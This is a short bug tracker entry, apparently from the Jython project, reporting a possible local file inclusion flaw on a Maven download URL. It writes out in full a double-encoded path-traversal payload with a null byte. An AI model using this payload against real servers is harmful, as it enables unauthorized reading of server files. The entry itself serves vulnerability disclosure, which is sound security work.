[Jython-bugs] [issue2782] LFI

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

New submission from Tugcan Ozel <tug...@gm...>:

while I download jython 2.7 for my burp plugin i see filepath paramater in GET requests and I tried LFI payload and i get picture that in attachments 
payload descp: double encoding and null paramater
payload:https://search.maven.org/remotecontent?filepath=%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%  25%5c..%25%5c..%00

----------
components: website
files: Screenshot from 2019-07-01 11-08-30.jpg
messages: 12570
nosy: forsa41
severity: critical
status: open
title: LFI
type: security
Added file: https://bugs.jython.org/file1673/Screenshot from 2019-07-01 11-08-30.jpg

_______________________________________
Jython tracker <re...@bu...>
<https://bugs.jython.org/issue2782>
_______________________________________